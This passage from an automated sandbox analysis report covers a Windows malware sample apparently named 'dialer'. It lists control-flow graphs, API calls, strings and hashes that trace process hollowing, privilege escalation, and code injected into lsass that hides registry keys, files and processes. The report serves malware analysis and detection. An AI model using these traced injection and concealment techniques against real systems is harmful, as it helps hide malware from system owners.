                                                  • Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseHandleOpenWow64
                                                  • String ID:
                                                  • API String ID: 10462204-0
                                                  • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                  • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                  • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                  • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 178 140002258-14000225c call 14000226c 180 140002261-140002263 ExitProcess 178->180
                                                  APIs
                                                    • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                    • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                    • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                    • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                    • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                    • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                    • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                    • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                    • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                    • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                    • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                    • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                    • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                    • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                    • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                    • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                  • ExitProcess.KERNEL32 ref: 0000000140002263
                                                  Memory Dump Source
                                                  • Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                  • String ID:
                                                  • API String ID: 3836936051-0
                                                  • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                  • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                  • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                  • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 189 140002560-14000258c 190 140002592 189->190 191 14000273a-140002742 189->191 192 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 190->192 193 140002598-14000259f 190->193 194 140002748-14000274b 191->194 195 14000297e-1400029a2 ReadFile 191->195 196 140002a74-140002a8e 192->196 198 140002704-140002715 192->198 199 1400025a5-1400025a8 193->199 200 1400026bd-1400026bf ExitProcess 193->200 201 140002751-140002756 194->201 202 140002974-140002979 call 14000175c 194->202 195->196 197 1400029a8-1400029af 195->197 197->196 206 1400029b5-1400029c9 call 1400018ac 197->206 198->196 207 14000271b-140002733 call 1400010c0 198->207 208 1400025ae-1400025b1 199->208 209 140002660-14000268b RegOpenKeyExW 199->209 203 140002919-14000292c call 140001944 201->203 204 14000275c-14000275f 201->204 202->196 203->196 231 140002932-140002941 call 140001944 203->231 210 140002761-140002766 204->210 211 14000279d-1400027ae call 140001944 204->211 206->196 229 1400029cf-1400029d5 206->229 232 140002735 207->232 218 140002651-14000265b 208->218 219 1400025b7-1400025ba 208->219 216 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 209->216 217 14000268d-14000269b RegDeleteValueW 209->217 210->196 220 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 210->220 211->196 240 1400027b4-1400027d6 ReadFile 211->240 216->196 217->216 218->196 226 140002644-14000264c 219->226 227 1400025c0-1400025c5 219->227 226->196 227->196 234 1400025cb-1400025ef ReadFile 227->234 238 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 229->238 239 140002a5f 229->239 231->196 255 140002947-14000296f ShellExecuteW 231->255 232->196 234->196 236 1400025f5-1400025fc 234->236 236->196 243 140002602-140002616 call 1400018ac 236->243 258 140002a18-140002a1e 238->258 259 140002a49-140002a4f GetProcessHeap 238->259 245 140002a66-140002a6f call 140002a90 239->245 240->196 247 1400027dc-1400027e3 240->247 243->196 264 14000261c-140002622 243->264 245->196 247->196 254 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 247->254 260 14000290b-140002914 GetProcessHeap 254->260 261 14000282d-140002839 254->261 255->196 258->259 265 140002a20-140002a32 258->265 262 140002a52-140002a5d HeapFree 259->262 260->262 261->260 266 14000283f-14000284b 261->266 262->196 268 140002624-140002633 call 1400010c0 264->268 269 140002638-14000263f 264->269 270 140002a34-140002a36 265->270 271 140002a38-140002a40 265->271 266->260 272 140002851-14000285c 266->272 268->196 269->245 270->271 276 140002a44 call 1400016cc 270->276 271->259 277 140002a42 271->277 273 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 272->273 274 14000285e-140002869 272->274 273->260 274->260 278 14000286f-14000287c call 140001c88 274->278 276->259 277->265 278->260
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                  • String ID: SOFTWARE$dialerstager$open
                                                  • API String ID: 3276259517-3931493855
                                                  • Opcode ID: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                  • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                  • Opcode Fuzzy Hash: ae79544a1ca264f77e0040c582fad8c70a14f3da5095032f2fa0f831f935a8fc
                                                  • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 285 140001c88-140001cb8 286 140001cbb-140001cc8 285->286 287 140001e8c-140001e91 286->287 288 140001cce-140001d25 CreateProcessW 286->288 287->286 291 140001e97 287->291 289 140001e88 288->289 290 140001d2b-140001d5a VirtualAllocEx 288->290 289->287 292 140001e5d-140001e60 290->292 293 140001d60-140001d7b WriteProcessMemory 290->293 294 140001e99-140001eb9 291->294 295 140001e62-140001e76 OpenProcess 292->295 296 140001e85 292->296 293->292 297 140001d81-140001d87 293->297 295->289 298 140001e78-140001e83 TerminateProcess 295->298 296->289 299 140001dd2-140001def VirtualAlloc 297->299 300 140001d89 297->300 298->289 299->292 301 140001df1-140001e07 GetThreadContext 299->301 302 140001d8c-140001dba WriteProcessMemory 300->302 301->292 304 140001e09-140001e2e WriteProcessMemory 301->304 302->292 303 140001dc0-140001dcc 302->303 303->302 305 140001dce 303->305 304->292 306 140001e30-140001e4c SetThreadContext 304->306 305->299 306->292 307 140001e4e-140001e5b ResumeThread 306->307 307->292 308 140001eba-140001ebf 307->308 308->294
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                  • String ID: @
                                                  • API String ID: 3462610200-2766056989
                                                  • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                  • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                  • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                  • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                  • String ID: dialersvc64
                                                  • API String ID: 4184240511-3881820561
                                                  • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                  • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                  • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                  • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: Delete$CloseEnumOpen
                                                  • String ID: SOFTWARE\dialerconfig
                                                  • API String ID: 3013565938-461861421
                                                  • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                  • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                  • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                  • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: File$Write$CloseCreateHandle
                                                  • String ID: \\.\pipe\dialercontrol_redirect64
                                                  • API String ID: 148219782-3440882674
                                                  • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                  • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                  • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                  • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000003F.00000002.3350070372.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                  • Associated: 0000003F.00000002.3350013421.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350114150.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000003F.00000002.3350178128.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_63_2_140000000_dialer.jbxd
                                                  Similarity
                                                  • API ID: AddressHandleModuleProc
                                                  • String ID: ntdll.dll
                                                  • API String ID: 1646373207-2227199552
                                                  • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                  • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                  • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                  • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                  Execution Graph

                                                  Execution Coverage:0.9%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:131
                                                  Total number of Limit Nodes:10
                                                  execution_graph 14899 140adfc273c 14901 140adfc276a 14899->14901 14900 140adfc2858 LoadLibraryA 14900->14901 14901->14900 14902 140adfc28d4 14901->14902 14903 140ae86202c 14905 140ae86205d 14903->14905 14904 140ae86213e 14905->14904 14906 140ae862173 14905->14906 14912 140ae862081 14905->14912 14907 140ae8621e7 14906->14907 14908 140ae862178 14906->14908 14907->14904 14911 140ae862f04 7 API calls 14907->14911 14921 140ae862f04 GetProcessHeap 14908->14921 14910 140ae8620b9 StrCmpNIW 14910->14912 14911->14904 14912->14904 14912->14910 14914 140ae861bf4 14912->14914 14915 140ae861c8b __free_lconv_mon 14914->14915 14916 140ae861c1b GetProcessHeap 14914->14916 14915->14912 14918 140ae861c41 __free_lconv_mon 14916->14918 14917 140ae861c77 GetProcessHeap 14917->14915 14918->14915 14918->14917 14928 140ae86152c 14918->14928 14926 140ae862f40 __free_lconv_mon 14921->14926 14922 140ae863015 GetProcessHeap 14923 140ae863029 __free_lconv_mon 14922->14923 14923->14904 14924 140ae863010 14924->14922 14925 140ae862fa2 StrCmpNIW 14925->14926 14926->14922 14926->14924 14926->14925 14927 140ae861bf4 4 API calls 14926->14927 14927->14926 14929 140ae86157c 14928->14929 14932 140ae861546 14928->14932 14929->14917 14930 140ae861565 StrCmpW 14930->14932 14931 140ae86155d StrCmpIW 14931->14932 14932->14929 14932->14930 14932->14931 14933 140ae861abc 14939 140ae861628 GetProcessHeap 14933->14939 14935 140ae861ad2 Sleep SleepEx 14937 140ae861acb 14935->14937 14937->14935 14938 140ae861598 StrCmpIW StrCmpW 14937->14938 14984 140ae8618b4 14937->14984 14938->14937 14940 140ae861648 __free_lconv_mon 14939->14940 15001 140ae861268 GetProcessHeap 14940->15001 14942 140ae861650 14943 140ae861268 2 API calls 14942->14943 14944 140ae861661 14943->14944 14945 140ae861268 2 API calls 14944->14945 14946 140ae86166a 14945->14946 14947 140ae861268 2 API calls 14946->14947 14948 140ae861673 14947->14948 14949 140ae86168e RegOpenKeyExW 14948->14949 14950 140ae8618a6 14949->14950 14951 140ae8616c0 RegOpenKeyExW 14949->14951 14950->14937 14952 140ae8616ff RegOpenKeyExW 14951->14952 14953 140ae8616e9 14951->14953 14955 140ae861723 14952->14955 14956 140ae86173a RegOpenKeyExW 14952->14956 15005 140ae8612bc RegQueryInfoKeyW 14953->15005 15016 140ae86104c RegQueryInfoKeyW 14955->15016 14959 140ae861775 RegOpenKeyExW 14956->14959 14960 140ae86175e 14956->14960 14957 140ae8616f5 RegCloseKey 14957->14952 14961 140ae8617b0 RegOpenKeyExW 14959->14961 14962 140ae861799 14959->14962 14964 140ae8612bc 11 API calls 14960->14964 14966 140ae8617d4 14961->14966 14967 140ae8617eb RegOpenKeyExW 14961->14967 14965 140ae8612bc 11 API calls 14962->14965 14968 140ae86176b RegCloseKey 14964->14968 14969 140ae8617a6 RegCloseKey 14965->14969 14970 140ae8612bc 11 API calls 14966->14970 14971 140ae861826 RegOpenKeyExW 14967->14971 14972 140ae86180f 14967->14972 14968->14959 14969->14961 14973 140ae8617e1 RegCloseKey 14970->14973 14975 140ae861861 RegOpenKeyExW 14971->14975 14976 140ae86184a 14971->14976 14974 140ae86104c 4 API calls 14972->14974 14973->14967 14979 140ae86181c RegCloseKey 14974->14979 14977 140ae861885 14975->14977 14978 140ae86189c RegCloseKey 14975->14978 14980 140ae86104c 4 API calls 14976->14980 14981 140ae86104c 4 API calls 14977->14981 14978->14950 14979->14971 14982 140ae861857 RegCloseKey 14980->14982 14983 140ae861892 RegCloseKey 14981->14983 14982->14975 14983->14978 15023 140ae8614a4 14984->15023 15022 140ae876168 15001->15022 15003 140ae861283 GetProcessHeap 15004 140ae8612ae __free_lconv_mon 15003->15004 15004->14942 15006 140ae861327 GetProcessHeap 15005->15006 15007 140ae86148a __free_lconv_mon 15005->15007 15013 140ae86133e __free_lconv_mon 15006->15013 15007->14957 15008 140ae861476 GetProcessHeap 15008->15007 15009 140ae861352 RegEnumValueW 15009->15013 15010 140ae86152c 2 API calls 15010->15013 15011 140ae8613d3 GetProcessHeap 15011->15013 15012 140ae86141e lstrlenW GetProcessHeap 15012->15013 15013->15008 15013->15009 15013->15010 15013->15011 15013->15012 15014 140ae8613f3 GetProcessHeap 15013->15014 15015 140ae861443 StrCpyW 15013->15015 15014->15013 15015->15013 15017 140ae8611b5 RegCloseKey 15016->15017 15018 140ae8610bf __free_lconv_mon 15016->15018 15017->14956 15018->15017 15019 140ae8610cf RegEnumValueW 15018->15019 15020 140ae86114e GetProcessHeap 15018->15020 15021 140ae86116e GetProcessHeap 15018->15021 15019->15018 15020->15018 15021->15018 15024 140ae8614e1 GetProcessHeap 15023->15024 15025 140ae8614c1 GetProcessHeap 15023->15025 15029 140ae876180 15024->15029 15026 140ae8614da __free_lconv_mon 15025->15026 15026->15024 15026->15025 15030 140ae876182 15029->15030 15031 140ae86253c 15033 140ae8625bb 15031->15033 15032 140ae8627aa 15033->15032 15034 140ae86261d GetFileType 15033->15034 15035 140ae862641 15034->15035 15036 140ae86262b StrCpyW 15034->15036 15047 140ae861a40 GetFinalPathNameByHandleW 15035->15047 15037 140ae862650 15036->15037 15041 140ae86265a 15037->15041 15045 140ae8626ff 15037->15045 15040 140ae863844 StrCmpNIW 15040->15045 15041->15032 15052 140ae863844 15041->15052 15055 140ae863044 StrCmpIW 15041->15055 15059 140ae861cac 15041->15059 15044 140ae863044 4 API calls 15044->15045 15045->15032 15045->15040 15045->15044 15046 140ae861cac 2 API calls 15045->15046 15046->15045 15048 140ae861a6a StrCmpNIW 15047->15048 15049 140ae861aa9 15047->15049 15048->15049 15050 140ae861a84 lstrlenW 15048->15050 15049->15037 15050->15049 15051 140ae861a96 StrCpyW 15050->15051 15051->15049 15053 140ae863851 StrCmpNIW 15052->15053 15054 140ae863866 15052->15054 15053->15054 15054->15041 15056 140ae863076 StrCpyW StrCatW 15055->15056 15057 140ae86308d PathCombineW 15055->15057 15058 140ae863096 15056->15058 15057->15058 15058->15041 15060 140ae861cc3 15059->15060 15062 140ae861ccc 15059->15062 15061 140ae86152c 2 API calls 15060->15061 15061->15062 15062->15041

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 5 140ae86253c-140ae8625c0 call 140ae882cc0 8 140ae8625c6-140ae8625c9 5->8 9 140ae8627d8-140ae8627fb 5->9 8->9 10 140ae8625cf-140ae8625dd 8->10 10->9 11 140ae8625e3-140ae862629 call 140ae868c60 * 3 GetFileType 10->11 18 140ae862641-140ae86264b call 140ae861a40 11->18 19 140ae86262b-140ae86263f StrCpyW 11->19 20 140ae862650-140ae862654 18->20 19->20 22 140ae8626ff-140ae862704 20->22 23 140ae86265a-140ae862673 call 140ae8630a8 call 140ae863844 20->23 24 140ae862707-140ae86270c 22->24 36 140ae862675-140ae8626a4 call 140ae8630a8 call 140ae863044 call 140ae861cac 23->36 37 140ae8626aa-140ae8626f4 call 140ae882cc0 23->37 26 140ae86270e-140ae862711 24->26 27 140ae862729 24->27 26->27 29 140ae862713-140ae862716 26->29 31 140ae86272c-140ae862745 call 140ae8630a8 call 140ae863844 27->31 29->27 32 140ae862718-140ae86271b 29->32 47 140ae862787-140ae862789 31->47 48 140ae862747-140ae862776 call 140ae8630a8 call 140ae863044 call 140ae861cac 31->48 32->27 35 140ae86271d-140ae862720 32->35 35->27 39 140ae862722-140ae862727 35->39 36->9 36->37 37->9 49 140ae8626fa 37->49 39->27 39->31 50 140ae8627aa-140ae8627ad 47->50 51 140ae86278b-140ae8627a5 47->51 48->47 68 140ae862778-140ae862783 48->68 49->23 54 140ae8627b7-140ae8627ba 50->54 55 140ae8627af-140ae8627b5 50->55 51->24 58 140ae8627d5 54->58 59 140ae8627bc-140ae8627bf 54->59 55->9 58->9 59->58 63 140ae8627c1-140ae8627c4 59->63 63->58 65 140ae8627c6-140ae8627c9 63->65 65->58 67 140ae8627cb-140ae8627ce 65->67 67->58 69 140ae8627d0-140ae8627d3 67->69 68->9 70 140ae862785 68->70 69->9 69->58 70->24
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                  • Instruction ID: 006047059f567fc424369bd4eaabb636d5541b44e56c09e15fbbbd16066aee87
                                                  • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                  • Instruction Fuzzy Hash: 6E71173624078185EB26DF2BD8407EAA790F38D7A4F640126DF0D5BBA9DE34CE45C382

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 71 140ae86202c-140ae862057 call 140ae882d00 73 140ae86205d-140ae862066 71->73 74 140ae86206f-140ae862072 73->74 75 140ae862068-140ae86206c 73->75 76 140ae862223-140ae862243 74->76 77 140ae862078-140ae86207b 74->77 75->74 78 140ae862173-140ae862176 77->78 79 140ae862081-140ae862093 77->79 81 140ae8621e7-140ae8621ea 78->81 82 140ae862178-140ae862192 call 140ae862f04 78->82 79->76 80 140ae862099-140ae8620a5 79->80 83 140ae8620a7-140ae8620b7 80->83 84 140ae8620d3-140ae8620de call 140ae861bbc 80->84 81->76 85 140ae8621ec-140ae8621ff call 140ae862f04 81->85 82->76 94 140ae862198-140ae8621ae 82->94 83->84 87 140ae8620b9-140ae8620d1 StrCmpNIW 83->87 91 140ae8620ff-140ae862111 84->91 96 140ae8620e0-140ae8620f8 call 140ae861bf4 84->96 85->76 95 140ae862201-140ae862209 85->95 87->84 87->91 97 140ae862113-140ae862115 91->97 98 140ae862121-140ae862123 91->98 94->76 99 140ae8621b0-140ae8621cc 94->99 95->76 100 140ae86220b-140ae862213 95->100 96->91 113 140ae8620fa-140ae8620fd 96->113 102 140ae862117-140ae86211a 97->102 103 140ae86211c-140ae86211f 97->103 104 140ae862125-140ae862128 98->104 105 140ae86212a 98->105 106 140ae8621d0-140ae8621e3 99->106 109 140ae862216-140ae862221 100->109 107 140ae86212d-140ae862130 102->107 103->107 104->107 105->107 106->106 108 140ae8621e5 106->108 111 140ae862132-140ae862138 107->111 112 140ae86213e-140ae862141 107->112 108->76 109->76 109->109 111->80 111->112 112->76 114 140ae862147-140ae86214b 112->114 113->107 115 140ae862162-140ae86216e 114->115 116 140ae86214d-140ae862150 114->116 115->76 116->76 117 140ae862156-140ae86215b 116->117 117->114 118 140ae86215d 117->118 118->76
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: S$dialer
                                                  • API String ID: 756756679-3873981283
                                                  • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                  • Instruction ID: 6995ce01178be5ec7128772deebd1550e485b351504c4b94060f668f1040f1af
                                                  • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                  • Instruction Fuzzy Hash: 6E51BE32B5572486EB62CB2BA8406EDA3F5F7087A4F249451DF0D13BA5DB35DC91C382

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                  • Instruction ID: c3158435ef4687b1766e3257663a9035ab9b0d40d8f3ba1c44d0f0f8ec37f8a1
                                                  • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                  • Instruction Fuzzy Hash: 7DF03C3274474192EB618B22E9847996760F74CBE9FA44020DF4D47979DE3DCA8DCB41

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000044.00000002.3354178003.00000140AE860000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000140AE860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_68_2_140ae860000_lsass.jbxd
                                                  Similarity
